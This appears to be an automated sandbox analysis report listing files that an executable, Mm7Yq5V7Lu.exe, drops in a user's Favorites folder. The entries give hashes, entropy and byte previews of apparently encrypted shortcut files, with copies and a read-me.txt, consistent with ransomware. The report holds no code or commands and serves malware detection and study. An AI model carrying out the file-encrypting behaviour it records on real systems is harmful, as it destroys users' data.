                                                                                                                                                      C:\Users\user\Favorites\NYTimes.url.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1056
                                                                                                                                                      Entropy (8bit):5.382918120434767
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:G49OFRbzTZ7MIezK8sevWAVgKTaCB7RZ0cHYIgtyUzc:/9iRvd7MIezCwgck38R
                                                                                                                                                      MD5:13FC8958F42A404C9E9EB635B37136CA
                                                                                                                                                      SHA1:ECB3303A1BBD0C51E81761510F32474349844886
                                                                                                                                                      SHA-256:B66FAC69CD2C583F5660237592F4310DA702035B3BAE29AFBB6EC12387522958
                                                                                                                                                      SHA-512:F2F0C8F1EF4B8F0B1C130E76E36317AD6F0D96252C012886C2DCB6D532417F9D26737D032CA453BA7069D74F4AD6021468067D71D3FC7F171EB3E5325A8D03B3
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: &.~Z.;..\H1.....%~..V..4...R.?Q..rl^.Oh.~.0.+#....l...J....ZP.......hX...........n..p...R.)......7a^..FC.$..3...3....z.d..Vwy.+..s.....4.3...IMuy.<J.}d..9t~..}I;GDY-%\.v7U.v. ..38Z..^.|..._.Y........N.e^GA..)D.i[`...mr..U..d...`..67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5.79 91 A5 31 FC 9B 61 4E 9C 5D 08 F9 41 2
                                                                                                                                                      C:\Users\user\Favorites\Reddit.url
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1056
                                                                                                                                                      Entropy (8bit):5.414472580937989
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1y0g8DczK8sevWAVgKTaCB7RZ0cHYIgtyUzX4ZH0:1Z5IzCwgck3890
                                                                                                                                                      MD5:C891BD67E93E132C451D8E36466C6F91
                                                                                                                                                      SHA1:225AEE8A028D04CB1FF052739CAF40198110887D
                                                                                                                                                      SHA-256:1B61A6F0988317BE8039C49FE2E6296FA1E5301C0394A0831F45D750C4DB9FA2
                                                                                                                                                      SHA-512:812A3D4493251FA03A0F751B9766888DB0B47C8ECFF7D121D9700445262840CB533D9F202FCF3204E39F27D1611F5DB335ACB787FF06F4863BBDC03FE6598800
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .+...*.!a`NZ...<.n.}y.\..&.(.K.P^._....}..s.U..5....r..|A.....,..)....v.......o.I.;....*T.ShAch>..,I.,..9...\t7.`A.....j.....Tg.2...d...&.^.....t*.W.;~.9...9.....5..ig...K6'n....T... ....y...N+..A..(?.P.<...*...=..)RL.r@.yh..Cp..67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5.79 91 A5 31 FC 9B 61 4E 9C 5D 08 F9 41 2
                                                                                                                                                      C:\Users\user\Favorites\Reddit.url.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1056
                                                                                                                                                      Entropy (8bit):5.414472580937989
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1y0g8DczK8sevWAVgKTaCB7RZ0cHYIgtyUzX4ZH0:1Z5IzCwgck3890
                                                                                                                                                      MD5:C891BD67E93E132C451D8E36466C6F91
                                                                                                                                                      SHA1:225AEE8A028D04CB1FF052739CAF40198110887D
                                                                                                                                                      SHA-256:1B61A6F0988317BE8039C49FE2E6296FA1E5301C0394A0831F45D750C4DB9FA2
                                                                                                                                                      SHA-512:812A3D4493251FA03A0F751B9766888DB0B47C8ECFF7D121D9700445262840CB533D9F202FCF3204E39F27D1611F5DB335ACB787FF06F4863BBDC03FE6598800
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .+...*.!a`NZ...<.n.}y.\..&.(.K.P^._....}..s.U..5....r..|A.....,..)....v.......o.I.;....*T.ShAch>..,I.,..9...\t7.`A.....j.....Tg.2...d...&.^.....t*.W.;~.9...9.....5..ig...K6'n....T... ....y...N+..A..(?.P.<...*...=..)RL.r@.yh..Cp..67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5.79 91 A5 31 FC 9B 61 4E 9C 5D 08 F9 41 2
                                                                                                                                                      C:\Users\user\Favorites\Twitter.url
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1056
                                                                                                                                                      Entropy (8bit):5.409878986315355
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:HIlA/SCatvzK8sevWAVgKTaCB7RZ0cHYIgtyUz1TD:Hj/xatvzCwgck38OD
                                                                                                                                                      MD5:97169D69E3F30FD63132793CFE72B452
                                                                                                                                                      SHA1:2500E9986B68B6A80619DE16B15A0EBF262B3B9A
                                                                                                                                                      SHA-256:28A04B8E09A48EDE93699D3D0A58CBA89DF016136D16C90783C4A5393F88888E
                                                                                                                                                      SHA-512:7A4F3AFCCC8AF7D06FAC923781471F184F5468BBB55FF4423FD4860F799530F73EBE63D524296529656B4CED4332B578E39009A2E98FEBD1BB881448A0131EF7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ......!.o....Z. J....$.]....b....CGc3.......U.yB.r,.k|p...L..\_...J.9.X-2..9n.1.SI..B...P.....Zp..c.... ..l._,..#..."y...Z.#.:..!y...2I.W.......tF...NG.B.f>ca..?.!7M.r...d.n].h. .m.k..M]..F..$(..E.T....}.........v..h.u...U.-y67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5.79 91 A5 31 FC 9B 61 4E 9C 5D 08 F9 41 2
                                                                                                                                                      C:\Users\user\Favorites\Twitter.url.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1056
                                                                                                                                                      Entropy (8bit):5.409878986315355
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:HIlA/SCatvzK8sevWAVgKTaCB7RZ0cHYIgtyUz1TD:Hj/xatvzCwgck38OD
                                                                                                                                                      MD5:97169D69E3F30FD63132793CFE72B452
                                                                                                                                                      SHA1:2500E9986B68B6A80619DE16B15A0EBF262B3B9A
                                                                                                                                                      SHA-256:28A04B8E09A48EDE93699D3D0A58CBA89DF016136D16C90783C4A5393F88888E
                                                                                                                                                      SHA-512:7A4F3AFCCC8AF7D06FAC923781471F184F5468BBB55FF4423FD4860F799530F73EBE63D524296529656B4CED4332B578E39009A2E98FEBD1BB881448A0131EF7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ......!.o....Z. J....$.]....b....CGc3.......U.yB.r,.k|p...L..\_...J.9.X-2..9n.1.SI..B...P.....Zp..c.... ..l._,..#..."y...Z.#.:..!y...2I.W.......tF...NG.B.f>ca..?.!7M.r...d.n].h. .m.k..M]..F..$(..E.T....}.........v..h.u...U.-y67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5.79 91 A5 31 FC 9B 61 4E 9C 5D 08 F9 41 2
                                                                                                                                                      C:\Users\user\Favorites\Wikipedia.url
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1072
                                                                                                                                                      Entropy (8bit):5.440633756581662
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:IbURHDZgE0laYmzK8sevWAVgKTaCB7RZ0cHYIgtyUzO6:UKCmzCwgck38j6
                                                                                                                                                      MD5:8B53B2325D75AE17603F0C2A3C7DE514
                                                                                                                                                      SHA1:76C517CC07D23973E2529E1E53BAEE0A7F5151A7
                                                                                                                                                      SHA-256:088E141AB1F1B58DF0261C22088921EA36F17FB1AB5C15D3D0539BAD70FB8BEB
                                                                                                                                                      SHA-512:EBBF3D60A926008481336AC56FF8F37DA2569640BA6FEEF90777F8F056979B7BEE1DF7CE4226FD20A15CB9822C89AEEB701FA68D437995247C89FD5335C7681A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: Q.?.55k..1.FIN|..u...Wq1.S$.a.>...b.........i.rL...E.............>z...6G..|.s....t..........S.w.&..............u.W..a.[JX.%....V'..$.gQ{...54......'t.?Q...P]Y..#.@..Z5..@>>M.r....w....{W..?eD..u...9.EW.t'.p.{..g.m..5P..,n.)=}x.Bn.).6..67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5.79 91 A5 31 FC 9B 61 4E
                                                                                                                                                      C:\Users\user\Favorites\Wikipedia.url.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1072
                                                                                                                                                      Entropy (8bit):5.440633756581662
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:IbURHDZgE0laYmzK8sevWAVgKTaCB7RZ0cHYIgtyUzO6:UKCmzCwgck38j6
                                                                                                                                                      MD5:8B53B2325D75AE17603F0C2A3C7DE514
                                                                                                                                                      SHA1:76C517CC07D23973E2529E1E53BAEE0A7F5151A7
                                                                                                                                                      SHA-256:088E141AB1F1B58DF0261C22088921EA36F17FB1AB5C15D3D0539BAD70FB8BEB
                                                                                                                                                      SHA-512:EBBF3D60A926008481336AC56FF8F37DA2569640BA6FEEF90777F8F056979B7BEE1DF7CE4226FD20A15CB9822C89AEEB701FA68D437995247C89FD5335C7681A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: Q.?.55k..1.FIN|..u...Wq1.S$.a.>...b.........i.rL...E.............>z...6G..|.s....t..........S.w.&..............u.W..a.[JX.%....V'..$.gQ{...54......'t.?Q...P]Y..#.@..Z5..@>>M.r....w....{W..?eD..u...9.EW.t'.p.{..g.m..5P..,n.)=}x.Bn.).6..67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5.79 91 A5 31 FC 9B 61 4E
                                                                                                                                                      C:\Users\user\Favorites\Youtube.url
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1056
                                                                                                                                                      Entropy (8bit):5.418033192020624
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:+anf5c9s9iyrsIzK8sevWAVgKTaCB7RZ0cHYIgtyUzRf:PnhUGIIzCwgck38w
                                                                                                                                                      MD5:D2DE7DF2AD3A7B9343839E95FDCD5748
                                                                                                                                                      SHA1:871B6DA3075657C53EDF3223C5DE61FA9C4156B8
                                                                                                                                                      SHA-256:7CEBA81559BCD34C2BA8019C7B8C03A061C4EA29CADF0873C38BF1BDB67EBD8F
                                                                                                                                                      SHA-512:EC9EA123201EC35DEC51C9242E565C11E3EC9D9DC9AD13C735ABB4B85167C39C8C1E4097B3DAC0D3F8576363A7F0B0D496A32EEBB0EAD0A9A3D6D44E916A6B7B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: #.m..............T..T.T...&.).\.,..."..z....f#.\.....qH......!..C.3.5gV.Bc.i......,......>8...C...5.-...'}.cRn.k..x!...!=.;.8-h..........QM...$..s.\.......dpp.A..4..........(.*.zx....r..P.."..k.QxE.._U.:.R.G...%.....O....&T..`67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5.79 91 A5 31 FC 9B 61 4E 9C 5D 08 F9 41 2
                                                                                                                                                      C:\Users\user\Favorites\Youtube.url.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1056
                                                                                                                                                      Entropy (8bit):5.418033192020624
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:+anf5c9s9iyrsIzK8sevWAVgKTaCB7RZ0cHYIgtyUzRf:PnhUGIIzCwgck38w
                                                                                                                                                      MD5:D2DE7DF2AD3A7B9343839E95FDCD5748
                                                                                                                                                      SHA1:871B6DA3075657C53EDF3223C5DE61FA9C4156B8
                                                                                                                                                      SHA-256:7CEBA81559BCD34C2BA8019C7B8C03A061C4EA29CADF0873C38BF1BDB67EBD8F
                                                                                                                                                      SHA-512:EC9EA123201EC35DEC51C9242E565C11E3EC9D9DC9AD13C735ABB4B85167C39C8C1E4097B3DAC0D3F8576363A7F0B0D496A32EEBB0EAD0A9A3D6D44E916A6B7B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: #.m..............T..T.T...&.).\.,..."..z....f#.\.....qH......!..C.3.5gV.Bc.i......,......>8...C...5.-...'}.cRn.k..x!...!=.;.8-h..........QM...$..s.\.......dpp.A..4..........(.*.zx....r..P.."..k.QxE.._U.:.R.G...%.....O....&T..`67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5.79 91 A5 31 FC 9B 61 4E 9C 5D 08 F9 41 2
                                                                                                                                                      C:\Users\user\Favorites\desktop.ini
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1360
                                                                                                                                                      Entropy (8bit):6.2127888764265595
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:xRYGtbxestzXMFiaVRzK8sevWAVgKTaCB7RZ0cHYIgtyUzzu:Xftkmz8Fi6RzCwgck38L
                                                                                                                                                      MD5:288B07FA920F9BC0421CDE360E66C6E6
                                                                                                                                                      SHA1:DDBA3382583081A15197CC6AFCC97B859F757736
                                                                                                                                                      SHA-256:5706326EE3C0D1E8861ADEB78D39A4A8F2C7938A6F957564C45113649EB5BF53
                                                                                                                                                      SHA-512:52AEAF89D6E4F8916034DB90F002EB21BE22A34319DA73FB1955C1C04B2DE64F5F33A9CA6B99A5939398463D64EC6B407727D62439556D5E57FD72E56487C018
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..k:.._...PFR.....?I.VL.L..0.IHP......EI *.Z.........P..v.s1.[...p..2#..^.$..j).6n8"m9..|A.../...6.4...>.x.J.;.4....$*.n..>k....y.t....)J...._Q`.....r$zz....%...X....D.G..:.^..Tr......p.)......n.0.F.g.0.i5..}?.n.-.#..QL.. Z....[... .v....F..L..n....l......].Z....i(....T.t..dv.....H.z>.L......p0A%.h(........../.T/@.i..:=......js...qt....2`I....D.*..........&.....X..3gnp.>c..Vu..rEx.....ZB...U..*7..X.@N.w..-S....f~....{..I.......2....p.T.r.....8....XC..9..FI.k.#.....9...P>....zZ..0@^.=..>AR...6.|.D...WJ....L..{\b..Hs.867 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4
                                                                                                                                                      C:\Users\user\Favorites\desktop.ini.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1360
                                                                                                                                                      Entropy (8bit):6.2127888764265595
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:xRYGtbxestzXMFiaVRzK8sevWAVgKTaCB7RZ0cHYIgtyUzzu:Xftkmz8Fi6RzCwgck38L
                                                                                                                                                      MD5:288B07FA920F9BC0421CDE360E66C6E6
                                                                                                                                                      SHA1:DDBA3382583081A15197CC6AFCC97B859F757736
                                                                                                                                                      SHA-256:5706326EE3C0D1E8861ADEB78D39A4A8F2C7938A6F957564C45113649EB5BF53
                                                                                                                                                      SHA-512:52AEAF89D6E4F8916034DB90F002EB21BE22A34319DA73FB1955C1C04B2DE64F5F33A9CA6B99A5939398463D64EC6B407727D62439556D5E57FD72E56487C018
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..k:.._...PFR.....?I.VL.L..0.IHP......EI *.Z.........P..v.s1.[...p..2#..^.$..j).6n8"m9..|A.../...6.4...>.x.J.;.4....$*.n..>k....y.t....)J...._Q`.....r$zz....%...X....D.G..:.^..Tr......p.)......n.0.F.g.0.i5..}?.n.-.#..QL.. Z....[... .v....F..L..n....l......].Z....i(....T.t..dv.....H.z>.L......p0A%.h(........../.T/@.i..:=......js...qt....2`I....D.*..........&.....X..3gnp.>c..Vu..rEx.....ZB...U..*7..X.@N.w..-S....f~....{..I.......2....p.T.r.....8....XC..9..FI.k.#.....9...P>....zZ..0@^.=..>AR...6.|.D...WJ....L..{\b..Hs.867 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4
                                                                                                                                                      C:\Users\user\Favorites\read-me.txt
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:false
